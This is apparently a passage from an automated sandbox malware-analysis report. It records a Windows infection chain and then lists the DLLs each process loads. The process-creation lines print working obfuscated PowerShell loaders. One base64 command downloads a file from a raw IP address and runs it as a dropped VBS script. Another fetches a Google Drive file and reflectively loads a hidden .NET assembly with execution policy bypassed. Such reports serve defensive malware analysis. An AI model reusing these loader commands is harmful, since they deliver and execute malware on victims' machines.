CAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jk3wn0wt\jk3wn0wt.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB606.tmp" "c:\Users\user\AppData\Local\Temp\jk3wn0wt\CSCA3D842248D9345F9BBF58E745EE55AE.TMP"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
          Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
